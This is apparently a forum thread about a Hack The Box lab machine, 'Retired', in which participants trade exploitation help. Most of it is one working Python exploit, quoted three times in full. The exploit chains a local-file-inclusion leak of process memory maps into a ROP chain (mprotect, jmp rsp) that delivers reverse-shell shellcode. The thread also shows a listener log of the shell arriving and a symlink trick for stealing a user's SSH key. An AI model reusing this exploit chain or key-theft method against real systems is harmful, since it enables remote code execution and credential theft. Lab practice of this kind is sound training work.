hi I have a complication when I try to pass the LFI -> RCE
who can help me?
plz...

---

(April 3, 2022, 12:48 PM)Internetdreams Wrote: Tryin to reverse that accept_licence

how?

can some explaint how to make this bof works please :(( .. i found the ssh password for dev user on this forum. but i want to see how to exploit that procces: activate_lincese please

PS. im kinda noob with BOF think

@skyweasel @mrfart 

You can use mprotect to unlock entire stack adn then JMP RSP to run reverse shell. There are more libraries than just libc. Other ones can give you more gadgets.

Anyone have a writeup regarding the binary exploitation?

well i try this but no luck , if we ... or I don't know vulnerable function  we can't do a shit.

https://masterccc.github.io/memo/rop_example/

Can some one explain me, how to  procced future with this bof please.

On kernel log i get:

Apr 27 20:09:47 debian kernel: [11674.449460] activate_licens[19618]: segfault at 424242424242 ip 0000424242424242 sp 00007fffffffe1b0 error 14 in activate_license[555555554000+1000]
Apr 27 20:09:47 debian kernel: [11674.449468] Code: Unable to access opcode bytes at RIP 0x424242424218.

from pwn import *
import requests

context.arch      = 'amd64'
context.os        = 'linux'
context.endian    = 'little'
context.word_size = 64

#proc = process(["./activate_license", "1337"])
binary = ELF("./activate_license", checksec=False)

pprint(binary.symbols)

mainfunc = binary.symbols['main'] # here i got nothink :((

offset  = 520
junk    = 6

payload = flat(b"A" * offset, b"B" * junk)


datafile  = {'licensefile': ("key.txt", payload, 'application/octet-stream')}
headers = {
      "Accept": "application/octet-stream",
      "Accept-Encoding": "gzip, deflate",
      "Connection": "close",
      "Upgrade-Insecure-Requests": "1"  
    }
    
requests.post('http://192.168.122.127/activate_license.php', files=datafile, headers=headers)

You just need to add the ROP chainmprotect + jmp rsp + shellcodefull script[code]#!/usr/bin/env pythonfrom pwn import *import sys,re,requests,socketIP="10.10.11.154"def usage(): print(f"Usage: {sys.argv[0]} ") exit()# download file and save to /tmpdef get_file(path): r = requests.get(f"http://{IP}/index.php?page={path}", allow_redirects=False) lpath = f"/tmp/{path.split('/')[-1]}" with open(lpath,"wb") as f: f.write(r.content) return lpath# find process iddef get_pid(): r = requests.get(f"http://{IP}/index.php?page=/proc/sched_debug", allow_redirects=False) pid = re.search("activate_licens\s+([0-9]+)",r.text).group(1) print(f"[+] activate_license running @ PID {pid}") return pid# extract base addresses from /proc/PID/mapsdef get_addresses(pid): r = requests.get(f"http://{IP}/index.php?page=/proc/{pid}/maps", allow_redirects=False) libc_base = int(re.search("^.*libc.*$", r.text, re.M).group(0).split("-")[0], 16) libc_path = re.search("^.*libc.*$", r.text, re.M).group(0).split(" ")[-1] libsqlite_base = int(re.search("^.*libsqlite.*$", r.text, re.M).group(0).split("-")[0], 16) libsqlite_path = re.search("^.*libsqlite.*$", r.text, re.M).group(0).split(" ")[-1] stack_base = int(re.search("^.*\[stack\].*$", r.text, re.M).group(0).split("-")[0], 16) stack_end = int(re.search("^.*\[stack\].*$", r.text, re.M).group(0).split("-")[1].split()[0], 16) return libc_base, libc_path,libsqlite_base, libsqlite_path, stack_base, stack_enddef main(): if len(sys.argv) < 3: usage() try: ip = socket.inet_aton(sys.argv[1]) port = port=struct.pack(">H",int(sys.argv[2])) except: print(f"[-] Invalid arguments") usage() # Shellcode msfvenom -p linux/x64/shell_reverse_tcp LHOST=ip LPORT=port -f py shellcode = b"" shellcode += b"\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48" shellcode += b"\x97\x48\xb9\x02\x00" + port + ip + b"\x51\x48" shellcode += b"\x89\xe6\x6a\x10\x5a\x6a\x2a\x58\x0f\x05\x6a\x03\x5e" shellcode += b"\x48\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x6a\x3b\x58" shellcode += b"\x99\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68\x00\x53\x48" shellcode += b"\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05" # search PID with LFI pid = get_pid() if not pid: print(f"[-] Could not find PID for activate_license") exit() # search addresses in /proc/PID/maps libc_base, libc_path, libsqlite_base, libsqlite_path, stack_base, stack_end = get_addresses(pid) # calc sizeof(stack) for mprotect stack_size = stack_end - stack_base # 0x21000 context.clear(arch='amd64') libc = ELF(get_file(libc_path),checksec=False) # download libc libc.address = libc_base libsql = ELF(get_file(libsqlite_path),checksec=False) # download libsqlite libsql.address = libsqlite_base rop = ROP([libc, libsql]) offset = 520 # search ROP Gadgets mprotect = libc.symbols['mprotect'] # 0xf8c20 readelf -s libc.so.6 | grep mprotect pop_rdi = rop.rdi[0] # 0x26796 ropper -f libc.so.6 --search "pop rdi" pop_rsi = rop.rsi[0] # 0x2890f ropper -f libc.so.6 --search "pop rsi" pop_rdx = rop.rdx[0] # 0xcb1cd ropper -f libc.so.6 --search "pop rdx" jmp_rsp = rop.jmp_rsp[0] # 0xd431d ropper -f libsqlite3.so.0.8.6 --search "jmp rsp" payload = b'A' * offset #int mprotect(void *addr, size_t len, int prot); payload += p64(pop_rdi) + p64(stack_base) # addr = Begin of Stack payload += p64(pop_rsi) + p64(stack_size) # len = size of Stack payload += p64(pop_rdx) + p64(7) # prot = Permission 7 -> rwx payload += p64(mprotect) # call mprotect payload += p64(jmp_rsp) # jmp rsp payload += shellcode # add shellcode # File Upload beta.html r = requests.post(f"http://{IP}/activate_license.php", files = { "licensefile": payload } ) if __name__ == "__main__": main()[/code]

[quote="josepoo" pid="43246" dateline="1651177047"]You just need to add the ROP chainmprotect + jmp rsp + shellcodefull script[code]#!/usr/bin/env pythonfrom pwn import *import sys,re,requests,socketIP="10.10.11.154"def usage(): print(f"Usage: {sys.argv[0]} ") exit()# download file and save to /tmpdef get_file(path): r = requests.get(f"http://{IP}/index.php?page={path}", allow_redirects=False) lpath = f"/tmp/{path.split('/')[-1]}" with open(lpath,"wb") as f: f.write(r.content) return lpath# find process iddef get_pid(): r = requests.get(f"http://{IP}/index.php?page=/proc/sched_debug", allow_redirects=False) pid = re.search("activate_licens\s+([0-9]+)",r.text).group(1) print(f"[+] activate_license running @ PID {pid}") return pid# extract base addresses from /proc/PID/mapsdef get_addresses(pid): r = requests.get(f"http://{IP}/index.php?page=/proc/{pid}/maps", allow_redirects=False) libc_base = int(re.search("^.*libc.*$", r.text, re.M).group(0).split("-")[0], 16) libc_path = re.search("^.*libc.*$", r.text, re.M).group(0).split(" ")[-1] libsqlite_base = int(re.search("^.*libsqlite.*$", r.text, re.M).group(0).split("-")[0], 16) libsqlite_path = re.search("^.*libsqlite.*$", r.text, re.M).group(0).split(" ")[-1] stack_base = int(re.search("^.*\[stack\].*$", r.text, re.M).group(0).split("-")[0], 16) stack_end = int(re.search("^.*\[stack\].*$", r.text, re.M).group(0).split("-")[1].split()[0], 16) return libc_base, libc_path,libsqlite_base, libsqlite_path, stack_base, stack_enddef main(): if len(sys.argv) < 3: usage() try: ip = socket.inet_aton(sys.argv[1]) port = port=struct.pack(">H",int(sys.argv[2])) except: print(f"[-] Invalid arguments") usage() # Shellcode msfvenom -p linux/x64/shell_reverse_tcp LHOST=ip LPORT=port -f py shellcode = b"" shellcode += b"\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48" shellcode += b"\x97\x48\xb9\x02\x00" + port + ip + b"\x51\x48" shellcode += b"\x89\xe6\x6a\x10\x5a\x6a\x2a\x58\x0f\x05\x6a\x03\x5e" shellcode += b"\x48\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x6a\x3b\x58" shellcode += b"\x99\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68\x00\x53\x48" shellcode += b"\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05" # search PID with LFI pid = get_pid() if not pid: print(f"[-] Could not find PID for activate_license") exit() # search addresses in /proc/PID/maps libc_base, libc_path, libsqlite_base, libsqlite_path, stack_base, stack_end = get_addresses(pid) # calc sizeof(stack) for mprotect stack_size = stack_end - stack_base # 0x21000 context.clear(arch='amd64') libc = ELF(get_file(libc_path),checksec=False) # download libc libc.address = libc_base libsql = ELF(get_file(libsqlite_path),checksec=False) # download libsqlite libsql.address = libsqlite_base rop = ROP([libc, libsql]) offset = 520 # search ROP Gadgets mprotect = libc.symbols['mprotect'] # 0xf8c20 readelf -s libc.so.6 | grep mprotect pop_rdi = rop.rdi[0] # 0x26796 ropper -f libc.so.6 --search "pop rdi" pop_rsi = rop.rsi[0] # 0x2890f ropper -f libc.so.6 --search "pop rsi" pop_rdx = rop.rdx[0] # 0xcb1cd ropper -f libc.so.6 --search "pop rdx" jmp_rsp = rop.jmp_rsp[0] # 0xd431d ropper -f libsqlite3.so.0.8.6 --search "jmp rsp" payload = b'A' * offset #int mprotect(void *addr, size_t len, int prot); payload += p64(pop_rdi) + p64(stack_base) # addr = Begin of Stack payload += p64(pop_rsi) + p64(stack_size) # len = size of Stack payload += p64(pop_rdx) + p64(7) # prot = Permission 7 -> rwx payload += p64(mprotect) # call mprotect payload += p64(jmp_rsp) # jmp rsp payload += shellcode # add shellcode # File Upload beta.html r = requests.post(f"http://{IP}/activate_license.php", files = { "licensefile": payload } ) if __name__ == "__main__": main()[/code][/quote]wow thank you so much :D now time to try understand what that code make.. Thanks again i learn also about /proc/<>/maps ..[code]listening on [any] 9001 ...connect to [10.10.14.229] from retired.htb [10.10.11.154] 60308iduid=33(www-data) gid=33(www-data) groups=33(www-data)[/code]

Anyone explain lateral movement data-www to dev   :(

[quote="nobushk" pid="43818" dateline="1651225209"][quote="josepoo" pid="43246" dateline="1651177047"]You just need to add the ROP chainmprotect + jmp rsp + shellcodefull script[code]#!/usr/bin/env pythonfrom pwn import *import sys,re,requests,socketIP="10.10.11.154"def usage(): print(f"Usage: {sys.argv[0]} ") exit()# download file and save to /tmpdef get_file(path): r = requests.get(f"http://{IP}/index.php?page={path}", allow_redirects=False) lpath = f"/tmp/{path.split('/')[-1]}" with open(lpath,"wb") as f: f.write(r.content) return lpath# find process iddef get_pid(): r = requests.get(f"http://{IP}/index.php?page=/proc/sched_debug", allow_redirects=False) pid = re.search("activate_licens\s+([0-9]+)",r.text).group(1) print(f"[+] activate_license running @ PID {pid}") return pid# extract base addresses from /proc/PID/mapsdef get_addresses(pid): r = requests.get(f"http://{IP}/index.php?page=/proc/{pid}/maps", allow_redirects=False) libc_base = int(re.search("^.*libc.*$", r.text, re.M).group(0).split("-")[0], 16) libc_path = re.search("^.*libc.*$", r.text, re.M).group(0).split(" ")[-1] libsqlite_base = int(re.search("^.*libsqlite.*$", r.text, re.M).group(0).split("-")[0], 16) libsqlite_path = re.search("^.*libsqlite.*$", r.text, re.M).group(0).split(" ")[-1] stack_base = int(re.search("^.*\[stack\].*$", r.text, re.M).group(0).split("-")[0], 16) stack_end = int(re.search("^.*\[stack\].*$", r.text, re.M).group(0).split("-")[1].split()[0], 16) return libc_base, libc_path,libsqlite_base, libsqlite_path, stack_base, stack_enddef main(): if len(sys.argv) < 3: usage() try: ip = socket.inet_aton(sys.argv[1]) port = port=struct.pack(">H",int(sys.argv[2])) except: print(f"[-] Invalid arguments") usage() # Shellcode msfvenom -p linux/x64/shell_reverse_tcp LHOST=ip LPORT=port -f py shellcode = b"" shellcode += b"\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48" shellcode += b"\x97\x48\xb9\x02\x00" + port + ip + b"\x51\x48" shellcode += b"\x89\xe6\x6a\x10\x5a\x6a\x2a\x58\x0f\x05\x6a\x03\x5e" shellcode += b"\x48\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x6a\x3b\x58" shellcode += b"\x99\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68\x00\x53\x48" shellcode += b"\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05" # search PID with LFI pid = get_pid() if not pid: print(f"[-] Could not find PID for activate_license") exit() # search addresses in /proc/PID/maps libc_base, libc_path, libsqlite_base, libsqlite_path, stack_base, stack_end = get_addresses(pid) # calc sizeof(stack) for mprotect stack_size = stack_end - stack_base # 0x21000 context.clear(arch='amd64') libc = ELF(get_file(libc_path),checksec=False) # download libc libc.address = libc_base libsql = ELF(get_file(libsqlite_path),checksec=False) # download libsqlite libsql.address = libsqlite_base rop = ROP([libc, libsql]) offset = 520 # search ROP Gadgets mprotect = libc.symbols['mprotect'] # 0xf8c20 readelf -s libc.so.6 | grep mprotect pop_rdi = rop.rdi[0] # 0x26796 ropper -f libc.so.6 --search "pop rdi" pop_rsi = rop.rsi[0] # 0x2890f ropper -f libc.so.6 --search "pop rsi" pop_rdx = rop.rdx[0] # 0xcb1cd ropper -f libc.so.6 --search "pop rdx" jmp_rsp = rop.jmp_rsp[0] # 0xd431d ropper -f libsqlite3.so.0.8.6 --search "jmp rsp" payload = b'A' * offset #int mprotect(void *addr, size_t len, int prot); payload += p64(pop_rdi) + p64(stack_base) # addr = Begin of Stack payload += p64(pop_rsi) + p64(stack_size) # len = size of Stack payload += p64(pop_rdx) + p64(7) # prot = Permission 7 -> rwx payload += p64(mprotect) # call mprotect payload += p64(jmp_rsp) # jmp rsp payload += shellcode # add shellcode # File Upload beta.html r = requests.post(f"http://{IP}/activate_license.php", files = { "licensefile": payload } ) if __name__ == "__main__": main()[/code][/quote]wow thank you so much :D now time to try understand what that code make.. Thanks again i learn also about /proc/<>/maps ..[code]listening on [any] 9001 ...connect to [10.10.14.229] from retired.htb [10.10.11.154] 60308iduid=33(www-data) gid=33(www-data) groups=33(www-data)[/code][/quote]dev runs "/usr/bin/webbackup" which takes a backup of the web directory and saves the zip file in "/var/www/" folder ... create a symlink of dev's ssh key in "/var/www/html" folder , copy the new zip file to /dev/shm and unzip it. you will find dev's ssh key in "/var/www/html/" Hope this helped :)